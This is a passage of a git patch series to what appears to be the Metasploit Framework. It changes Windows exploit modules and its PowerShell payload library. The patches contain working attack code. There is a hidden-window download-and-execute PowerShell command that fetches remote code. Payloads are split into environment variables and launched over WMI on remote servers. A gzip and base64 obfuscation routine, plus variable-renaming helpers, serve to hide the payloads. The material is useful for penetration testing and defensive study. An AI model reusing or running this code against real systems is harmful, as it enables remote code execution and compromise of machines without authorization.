     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-    command = "powershell.exe -w hidden -nop -c #{download_and_run}"
+    command = generate_psh_command_line({
+      :noprofile => true,
+      :windowstyle => 'hidden',
+      :command => download_and_run
+    })
     make_it(command)
   end
 

From 622a1dccda930ce20093f16d4699bd0f9acd4433 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 22 Nov 2013 23:18:22 +0000
Subject: [PATCH 029/321] Update wmi to use generated powershell command line

---
 modules/exploits/windows/local/wmi.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index d40d33e886..8043057f70 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -93,7 +93,11 @@ class Metasploit3 < Msf::Exploit::Local
         end
 
         x = rand_text_alpha(rand(3)+3)
-        exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"
+        exec_cmd = generate__psh_command_line({
+          :noprofile => true,
+          :windowstyle => 'hidden',
+          :command => "$#{x} = ''"
+        })
         env_vars.each do |env|
           exec_cmd << "+$env:#{env}"
         end

From ec36cebeb45c79ea29161f6650ddf150291ab748 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 22 Nov 2013 23:26:06 +0000
Subject: [PATCH 030/321] Update cmd_psh_payloads to send the architecture.

---
 modules/exploits/windows/browser/ie_unsafe_scripting.rb   | 2 +-
 modules/exploits/windows/http/oracle_endeca_exec.rb       | 2 +-
 modules/exploits/windows/local/current_user_psexec.rb     | 2 +-
 modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb | 2 +-
 modules/exploits/windows/local/wmi.rb                     | 2 +-
 5 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
index 2738d40f38..06752b9fe0 100644
--- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb
+++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
@@ -120,7 +120,7 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
   end
 
   def psh_technique(var_shellobj, p)
-    cmd = Rex::Text.to_hex(cmd_psh_payload(p.encoded))
+    cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
     js_content = %Q|
 //<html><head></head><body><script>
 var #{var_shellobj} = new ActiveXObject("WScript.Shell");
diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb
index 45ce9d8c4c..0cd0a6264e 100644
--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    command = cmd_psh_payload(payload.encoded)
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
     if command.length > 8000
       # Windows 2008 Command Prompt Max Length is 8191
       fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb
index a89fc57d3c..478da8f767 100644
--- a/modules/exploits/windows/local/current_user_psexec.rb
+++ b/modules/exploits/windows/local/current_user_psexec.rb
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
     else
-      service_executable = cmd_psh_payload(payload.encoded)
+      service_executable = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
     end
 
     begin
diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
index 765a73f51c..1cefddceda 100644
--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -160,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Local
         command = datastore['CUSTOM_COMMAND']
       else
         print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the powershell command line payload")
-        command = cmd_psh_payload(payload.encoded)
+        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
       end
       make_it(command)
     else
diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index 8043057f70..b5ff74e133 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Get the PSH Payload and split it into bitesize chunks
       # 1024 appears to be the max value allowed in env vars
-      psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
+      psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first).gsub("\r\n","")
       psh = psh[psh.index("$si")..psh.length-1]
       chunks = split_code(psh, 1024)
 

From c194fdc67e784dd95aa2bd9b4201b7f7c7aa9d9d Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 23 Nov 2013 00:31:11 +0000
Subject: [PATCH 031/321] Fixup WMI -c doesn't like $var assignments

---
 lib/msf/core/exploit/powershell.rb    | 7 +++----
 modules/exploits/windows/local/wmi.rb | 7 +++----
 2 files changed, 6 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 5b524bd991..b4a5b7ef40 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -190,12 +190,12 @@ EOS
     process_start_info.gsub!("\n",';')
 
     archictecure_detection = <<EOS
-$x86=#{arch_x86};
+Set-Variable x86 #{arch_x86};
 if ([IntPtr]::Size -eq 4) {
   if ($x86) {
     $ps_bin='powershell.exe'
   } else {
-    $ps_bin==$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
+    $ps_bin=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
   }
 } else {
   if ($x86) {
@@ -245,12 +245,11 @@ EOS
     #final_payload = encode_script(hidden_payload)
 
     # Convert to base64 for -encodedcommand execution
-    psh_command = generate_psh_command_line({
+    command = generate_psh_command_line({
                                     :noprofile => true,
                                     :windowstyle => 'hidden',
                                     :command => final_payload
                                 })
-    command = "%COMSPEC% /B /C start /min #{psh_command}\r\n"
     vprint_status("Command length: #{command.length}")
     return command
   end
diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index b5ff74e133..3ff3a04938 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -79,7 +79,6 @@ class Metasploit3 < Msf::Exploit::Local
       # Get the PSH Payload and split it into bitesize chunks
       # 1024 appears to be the max value allowed in env vars
       psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first).gsub("\r\n","")
-      psh = psh[psh.index("$si")..psh.length-1]
       chunks = split_code(psh, 1024)
 
       begin
@@ -93,10 +92,10 @@ class Metasploit3 < Msf::Exploit::Local
         end
 
         x = rand_text_alpha(rand(3)+3)
-        exec_cmd = generate__psh_command_line({
+        exec_cmd = generate_psh_command_line({
           :noprofile => true,
           :windowstyle => 'hidden',
-          :command => "$#{x} = ''"
+          :command => "$#{x}=''"
         })
         env_vars.each do |env|
           exec_cmd << "+$env:#{env}"
@@ -109,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Local
         print_status("[#{server}] Cleaning up environment variables")
         env_vars.each do |env|
           cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
-          wmic_command(server, cleanup_cmd)
+          #wmic_command(server, cleanup_cmd)
         end
       rescue Rex::Post::Meterpreter::RequestError => e
         print_error("[#{server}] Error moving on... #{e}")

From 1c60373f685a30ac7a52f8808517163564a2e9e2 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 23 Nov 2013 00:45:04 +0000
Subject: [PATCH 032/321] Reinstate %COMSPEC%

---
 lib/msf/core/exploit/powershell.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index b4a5b7ef40..6e7411c298 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -245,11 +245,13 @@ EOS
     #final_payload = encode_script(hidden_payload)
 
     # Convert to base64 for -encodedcommand execution
-    command = generate_psh_command_line({
+    psh_command = generate_psh_command_line({
                                     :noprofile => true,
                                     :windowstyle => 'hidden',
                                     :command => final_payload
                                 })
+
+    command = "%COMSPEC% /b /c #{psh_command}"
     vprint_status("Command length: #{command.length}")
     return command
   end

From 259d5a2dbaefd485da4474436d4b4a4db156a2e2 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 23 Nov 2013 01:15:13 +0000
Subject: [PATCH 033/321] Backout Set-Variable as it is 3.0 only

---
 lib/msf/core/exploit/powershell.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 6e7411c298..1849323d4c 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -190,7 +190,7 @@ EOS
     process_start_info.gsub!("\n",';')
 
     archictecure_detection = <<EOS
-Set-Variable x86 #{arch_x86};
+$x86=#{arch_x86};
 if ([IntPtr]::Size -eq 4) {
   if ($x86) {
     $ps_bin='powershell.exe'

From 6c83109422a8097cb834f716d593dfc9ca55fa42 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 23 Nov 2013 16:44:44 +0000
Subject: [PATCH 034/321] Really fix wmi

---
 lib/msf/core/exploit/powershell.rb    | 13 ++++++-------
 modules/exploits/windows/local/wmi.rb | 11 ++++++++---
 2 files changed, 14 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 1849323d4c..46b04be1ec 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -189,6 +189,7 @@ $p=[System.Diagnostics.Process]::Start($si)
 EOS
     process_start_info.gsub!("\n",';')
 
+
     archictecure_detection = <<EOS
 $x86=#{arch_x86};
 if ([IntPtr]::Size -eq 4) {
@@ -242,16 +243,14 @@ EOS
     # Wrap in hidden runtime / architecture detection
     final_payload = run_hidden_psh(smallest_payload, payload_arch)
 
-    #final_payload = encode_script(hidden_payload)
-
-    # Convert to base64 for -encodedcommand execution
     psh_command = generate_psh_command_line({
-                                    :noprofile => true,
-                                    :windowstyle => 'hidden',
-                                    :command => final_payload
-                                })
+                      :noprofile => true,
+                      :windowstyle => 'hidden',
+                      :command => final_payload
+    })
 
     command = "%COMSPEC% /b /c #{psh_command}"
+ 
     vprint_status("Command length: #{command.length}")
     return command
   end
diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index 3ff3a04938..c4f3062f5e 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -78,8 +78,13 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Get the PSH Payload and split it into bitesize chunks
       # 1024 appears to be the max value allowed in env vars
-      psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first).gsub("\r\n","")
-      chunks = split_code(psh, 1024)
+      psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first).strip
+      psh.gsub!("'","''")
+      # We have to use single quotes because IEX does not like ; used in the
+      # arguments
+      psh.gsub!("-c ","-c '")
+      psh << "'\r\n"
+      chunks = split_code(psh, 1000)
 
       begin
         print_status("[#{server}] Storing payload in environment variables")
@@ -108,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
         print_status("[#{server}] Cleaning up environment variables")
         env_vars.each do |env|
           cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
-          #wmic_command(server, cleanup_cmd)
+          wmic_command(server, cleanup_cmd)
         end
       rescue Rex::Post::Meterpreter::RequestError => e
         print_error("[#{server}] Error moving on... #{e}")

From cd68b10bcf9315b5b746658a2006f2357dbd29ec Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 23 Nov 2013 19:18:13 +0000
Subject: [PATCH 035/321] Broadcast needs a decent WfsDelay.

Due to the multi railgun changes. Because they return quickly but
the process is still broadcasting them the exploit thinks work has
finished...
---
 modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
index 1cefddceda..ef1737feca 100644
--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -51,7 +51,11 @@ class Metasploit3 < Msf::Exploit::Local
         [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
       ],
       'DefaultTarget' => 0,
-      'DisclosureDate'=> "Nov 27 2012",
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 40,
+        },
+      'DisclosureDate' => "Nov 27 2012",
       'References' =>
         [
           [ 'CVE', '2013-0008' ],

From 435cc9b93ff7a7a219e0db118ec790f1aa7618d5 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 16 Dec 2013 15:13:13 +0000
Subject: [PATCH 036/321] Add single quote encapsulation

For WMI and psh_web_delivery
---
 lib/msf/core/exploit/powershell.rb            | 19 +++++++++++++++----
 modules/exploits/windows/local/wmi.rb         | 12 ++++++------
 .../exploits/windows/misc/psh_web_delivery.rb | 12 ++++++++++--
 3 files changed, 31 insertions(+), 12 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 46b04be1ec..a92aff6805 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -215,9 +215,9 @@ EOS
   #
   # Creates cmd script to execute psh payload
   #
-  def cmd_psh_payload(pay, payload_arch, old_psh=datastore['PSH::old_technique'])
+  def cmd_psh_payload(pay, payload_arch, opts={})
     # Allow powershell 1.0 format
-    if old_psh
+    if opts[:old_psh] || datastore['PSH::old_technique']
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
     else
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
@@ -243,14 +243,25 @@ EOS
     # Wrap in hidden runtime / architecture detection
     final_payload = run_hidden_psh(smallest_payload, payload_arch)
 
+    if opts[:use_single_quotes]
+      # Escape Single Quotes
+      final_payload.gsub!("'","''")
+      # Wrap in quotes
+      final_payload = "'#{final_payload}'"
+    end
+
     psh_command = generate_psh_command_line({
                       :noprofile => true,
                       :windowstyle => 'hidden',
                       :command => final_payload
     })
 
-    command = "%COMSPEC% /b /c #{psh_command}"
- 
+    if opts[:remove_comspec]
+      command = psh_command
+    else
+      command = "%COMSPEC% /b /c #{psh_command}"
+    end
+
     vprint_status("Command length: #{command.length}")
     return command
   end
diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index c4f3062f5e..e57b010dbf 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -78,12 +78,12 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Get the PSH Payload and split it into bitesize chunks
       # 1024 appears to be the max value allowed in env vars
-      psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first).strip
-      psh.gsub!("'","''")
-      # We have to use single quotes because IEX does not like ; used in the
-      # arguments
-      psh.gsub!("-c ","-c '")
-      psh << "'\r\n"
+      psh = cmd_psh_payload(payload.encoded,
+                            payload_instance.arch.first,
+                            {
+                                :remove_comspec => true,
+                                :use_single_quotes => true
+                            })
       chunks = split_code(psh, 1000)
 
       begin
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 271d010792..a0256fe787 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -50,8 +50,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Delivering Payload")
-    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
-    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+    data = Msf::Util::EXE.to_win32pe_psh_net(framework,
+                                             payload.encoded,
+                                             )
+    psh = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                              :remove_comspec => true,
+                              :use_single_quotes => true
+                          })
+    send_response(cli, psh, { 'Content-Type' => 'application/octet-stream' })
   end
 
   def primer

From 09c48358f4f92b5ec3e07cb7389c8f1b5d71ffc4 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 8 Feb 2014 20:43:04 +0000
Subject: [PATCH 037/321] Retab rex powershell

---
 lib/rex/exploitation/powershell.rb | 686 +++++++++++++++--------------
 1 file changed, 344 insertions(+), 342 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 195834538d..f872a2d700 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -8,26 +8,27 @@ module Exploitation
 
 module Powershell
 
-	module Output
+  module Output
 
-		def to_s
-			code
-		end
+    def to_s
+      code
+    end
 
-		def size
-			code.size
-		end
+    def size
+      code.size
+    end
+
+    #
+    # Return code with numbered lines
+    #
+    def to_s_lineno
+      numbered = ''
+      code.split(/\r\n|\n/).each_with_index do |line,idx|
+        numbered << "#{idx}: #{line}"
+      end
+      return numbered
+    end
 
-		#
-		# Return code with numbered lines
-		#
-		def to_s_lineno
-			numbered = ''
-			code.split(/\r\n|\n/).each_with_index do |line,idx|
-				numbered << "#{idx}: #{line}"
-			end
-			return numbered
-		end
     #
     # Return a Base64 encoded powershell code
     #
@@ -40,351 +41,352 @@ module Powershell
 
       return code
     end
-		#
-		# Return a zlib compressed powershell code
-		#
-		def compress_code(eof = nil)
-			# Compress using the Deflate algorithm
-			compressed_stream = Rex::Text.gzip(code)
 
-			# Base64 encode the compressed file contents
-			encoded_stream = Rex::Text.encode_base64(compressed_stream)
+    #
+    # Return a zlib compressed powershell code
+    #
+    def compress_code(eof = nil)
+      # Compress using the Deflate algorithm
+      compressed_stream = Rex::Text.gzip(code)
 
-			# Build the powershell expression
-			# Decode base64 encoded command and create a stream object
-			psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-			psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
-			# Uncompress and invoke the expression (execute)
-			psh_expression << "$(IEX $(New-Object IO.StreamReader("
-			psh_expression << "$(New-Object IO.Compression.GzipStream("
-			psh_expression << "$stream,"
-			psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
-			psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+      # Base64 encode the compressed file contents
+      encoded_stream = Rex::Text.encode_base64(compressed_stream)
 
-			# If eof is set, add a marker to signify end of code output
-			#if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
-			psh_expression << "echo '#{eof}';" if eof
+      # Build the powershell expression
+      # Decode base64 encoded command and create a stream object
+      psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      # Uncompress and invoke the expression (execute)
+      psh_expression << "$(IEX $(New-Object IO.StreamReader("
+      psh_expression << "$(New-Object IO.Compression.GzipStream("
+      psh_expression << "$stream,"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
+      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
 
-			# Convert expression to unicode
-			unicode_expression = Rex::Text.to_unicode(psh_expression)
+      # If eof is set, add a marker to signify end of code output
+      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      psh_expression << "echo '#{eof}';" if eof
 
-			# Base64 encode the unicode expression
-			@code = Rex::Text.encode_base64(unicode_expression)
+      # Convert expression to unicode
+      unicode_expression = Rex::Text.to_unicode(psh_expression)
 
-			return code
-		end
+      # Base64 encode the unicode expression
+      @code = Rex::Text.encode_base64(unicode_expression)
 
-		#
-		# Reverse the compression process
-		#
-		def decompress_code
-			# Decode base64 and convert to ascii
-			raw = Rex::Text.decode_base64(code)
-			ascii_expression = Rex::Text.to_ascii(raw)
-			# Extract substring with payload
-			encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
-			# Decode and decompress the string
-			return Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) )
-			# ::Zlib::Inflate.inflate( Rex::Text.decode_base64(encoded_stream) )
-		end
-	end
+      return code
+    end
 
-	module Parser
+    #
+    # Reverse the compression process
+    #
+    def decompress_code
+      # Decode base64 and convert to ascii
+      raw = Rex::Text.decode_base64(code)
+      ascii_expression = Rex::Text.to_ascii(raw)
+      # Extract substring with payload
+      encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
+      # Decode and decompress the string
+      return Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) )
+      # ::Zlib::Inflate.inflate( Rex::Text.decode_base64(encoded_stream) )
+    end
+  end
 
-		#
-		# Get variable names from code, removes reserved names from return
-		#
-		def get_var_names
-			# Reserved special variables
-			# Acquired with: Get-Variable | Format-Table name, value -auto
-			res_vars = [
-				'$$',
-				'$?',
-				'$^',
-				'$_',
-				'$args',
-				'$ConfirmPreference',
-				'$ConsoleFileName',
-				'$DebugPreference',
-				'$Env',
-				'$Error',
-				'$ErrorActionPreference',
-				'$ErrorView',
-				'$ExecutionContext',
-				'$false',
-				'$FormatEnumerationLimit',
-				'$HOME',
-				'$Host',
-				'$input',
-				'$LASTEXITCODE',
-				'$MaximumAliasCount',
-				'$MaximumDriveCount',
-				'$MaximumErrorCount',
-				'$MaximumFunctionCount',
-				'$MaximumHistoryCount',
-				'$MaximumVariableCount',
-				'$MyInvocation',
-				'$NestedPromptLevel',
-				'$null',
-				'$OutputEncoding',
-				'$PID',
-				'$PROFILE',
-				'$ProgressPreference',
-				'$PSBoundParameters',
-				'$PSCulture',
-				'$PSEmailServer',
-				'$PSHOME',
-				'$PSSessionApplicationName',
-				'$PSSessionConfigurationName',
-				'$PSSessionOption',
-				'$PSUICulture',
-				'$PSVersionTable',
-				'$PWD',
-				'$ReportErrorShowExceptionClass',
-				'$ReportErrorShowInnerException',
-				'$ReportErrorShowSource',
-				'$ReportErrorShowStackTrace',
-				'$ShellId',
-				'$StackTrace',
-				'$true',
-				'$VerbosePreference',
-				'$WarningPreference',
-				'$WhatIfPreference'
-			].map(&:downcase)
+  module Parser
+
+    #
+    # Get variable names from code, removes reserved names from return
+    #
+    def get_var_names
+      # Reserved special variables
+      # Acquired with: Get-Variable | Format-Table name, value -auto
+      res_vars = [
+        '$$',
+        '$?',
+        '$^',
+        '$_',
+        '$args',
+        '$ConfirmPreference',
+        '$ConsoleFileName',
+        '$DebugPreference',
+        '$Env',
+        '$Error',
+        '$ErrorActionPreference',
+        '$ErrorView',
+        '$ExecutionContext',
+        '$false',
+        '$FormatEnumerationLimit',
+        '$HOME',
+        '$Host',
+        '$input',
+        '$LASTEXITCODE',
+        '$MaximumAliasCount',
+        '$MaximumDriveCount',
+        '$MaximumErrorCount',
+        '$MaximumFunctionCount',
+        '$MaximumHistoryCount',
+        '$MaximumVariableCount',
+        '$MyInvocation',
+        '$NestedPromptLevel',
+        '$null',
+        '$OutputEncoding',
+        '$PID',
+        '$PROFILE',
+        '$ProgressPreference',
+        '$PSBoundParameters',
+        '$PSCulture',
+        '$PSEmailServer',
+        '$PSHOME',
+        '$PSSessionApplicationName',
+        '$PSSessionConfigurationName',
+        '$PSSessionOption',
+        '$PSUICulture',
+        '$PSVersionTable',
+        '$PWD',
+        '$ReportErrorShowExceptionClass',
+        '$ReportErrorShowInnerException',
+        '$ReportErrorShowSource',
+        '$ReportErrorShowStackTrace',
+        '$ShellId',
+        '$StackTrace',
+        '$true',
+        '$VerbosePreference',
+        '$WarningPreference',
+        '$WhatIfPreference'
+      ].map(&:downcase)
 
 
-			our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
-			return our_vars.select {|v| !res_vars.include?(v)}
-		end
+      our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
+      return our_vars.select {|v| !res_vars.include?(v)}
+    end
 
-		#
-		# Get function names from code
-		#
-		def get_func_names
-			return code.scan(/function\s([a-zA-Z\-\_]+)/).uniq.flatten
-		end
+    #
+    # Get function names from code
+    #
+    def get_func_names
+      return code.scan(/function\s([a-zA-Z\-\_]+)/).uniq.flatten
+    end
 
-		# Attempt to find string literals in PSH expression
-		def get_string_literals
-			code.scan(/@"(.*)"@|@'(.*)'@/)
-		end
+    # Attempt to find string literals in PSH expression
+    def get_string_literals
+      code.scan(/@"(.*)"@|@'(.*)'@/)
+    end
 
-		#
-		# Scan code and return matches with index
-		#
-		def scan_with_index(str,source=code)
-			::Enumerator.new do |y|
-				source.scan(str) do
-					y << ::Regexp.last_match
-				end
-			end.map{|m| [m.to_s,m.offset(0)[0]]}
-		end
+    #
+    # Scan code and return matches with index
+    #
+    def scan_with_index(str,source=code)
+      ::Enumerator.new do |y|
+        source.scan(str) do
+          y << ::Regexp.last_match
+        end
+      end.map{|m| [m.to_s,m.offset(0)[0]]}
+    end
 
-		#
-		# Return matching backet type
-		#
-		def match_start(char)
-			case char
-			when '{'
-				'}'
-			when '('
-				')'
-			when '['
-				']'
-			when '<'
-				'>'
-			end
-		end
+    #
+    # Return matching backet type
+    #
+    def match_start(char)
+      case char
+      when '{'
+        '}'
+      when '('
+        ')'
+      when '['
+        ']'
+      when '<'
+        '>'
+      end
+    end
 
-		#
-		# Extract block of code between inside brackets/parens
-		#
-		# Attempts to match the bracket at idx, handling nesting manually
-		# Once the balanced matching bracket is found, all script content
-		# between idx and the index of the matching bracket is returned
-		#
-		def block_extract(idx)
-			start = code[idx]
-			stop = match_start(start)
-			delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
-			delims.map {|x| x[1] = x[1] + idx + 1}
-			c = 1
-			sidx = nil
-			# Go through delims till we balance, get idx
-			while not c == 0 and x = delims.shift do
-				sidx = x[1]
-				x[0] == stop ? c -=1 : c+=1
-			end
-			return code[idx..sidx]
-		end
+    #
+    # Extract block of code between inside brackets/parens
+    #
+    # Attempts to match the bracket at idx, handling nesting manually
+    # Once the balanced matching bracket is found, all script content
+    # between idx and the index of the matching bracket is returned
+    #
+    def block_extract(idx)
+      start = code[idx]
+      stop = match_start(start)
+      delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
+      delims.map {|x| x[1] = x[1] + idx + 1}
+      c = 1
+      sidx = nil
+      # Go through delims till we balance, get idx
+      while not c == 0 and x = delims.shift do
+        sidx = x[1]
+        x[0] == stop ? c -=1 : c+=1
+      end
+      return code[idx..sidx]
+    end
 
-		def get_func(func_name, delete = false)
-			start = code.index(func_name)
-			idx = code[start..-1].index('{') + start
-			func_txt = block_extract(idx)
-			code.delete(ftxt) if delete
-			return Function.new(func_name,func_txt)
-		end
-	end # Parser
+    def get_func(func_name, delete = false)
+      start = code.index(func_name)
+      idx = code[start..-1].index('{') + start
+      func_txt = block_extract(idx)
+      code.delete(ftxt) if delete
+      return Function.new(func_name,func_txt)
+    end
+  end # Parser
 
-	module Obfu
+  module Obfu
 
-		#
-		# Create hash of string substitutions
-		#
-		def sub_map_generate(strings)
-			map = {}
-			strings.flatten.each do |str|
-				map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
-				# Ensure our variables are unique
-				while not map.values.uniq == map.values
-					map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
-				end
-			end
-			return map
-		end
+    #
+    # Create hash of string substitutions
+    #
+    def sub_map_generate(strings)
+      map = {}
+      strings.flatten.each do |str|
+        map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+        # Ensure our variables are unique
+        while not map.values.uniq == map.values
+          map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+        end
+      end
+      return map
+    end
 
-		#
-		# Remove comments
-		#
-		def strip_comments
-			# Multi line
-			code.gsub!(/<#(.*?)#>/m,'')
-			# Single line
-			code.gsub!(/^#.*$|^\s+#.*$/,'')
-		end
+    #
+    # Remove comments
+    #
+    def strip_comments
+      # Multi line
+      code.gsub!(/<#(.*?)#>/m,'')
+      # Single line
+      code.gsub!(/^#.*$|^\s+#.*$/,'')
+    end
 
-		#
-		# Remove whitespace
-		# This can break some codes using inline .NET
-		#
-		def strip_whitespace
-			code.gsub!(/\s+/,' ')
-		end
+    #
+    # Remove whitespace
+    # This can break some codes using inline .NET
+    #
+    def strip_whitespace
+      code.gsub!(/\s+/,' ')
+    end
 
 
-		#
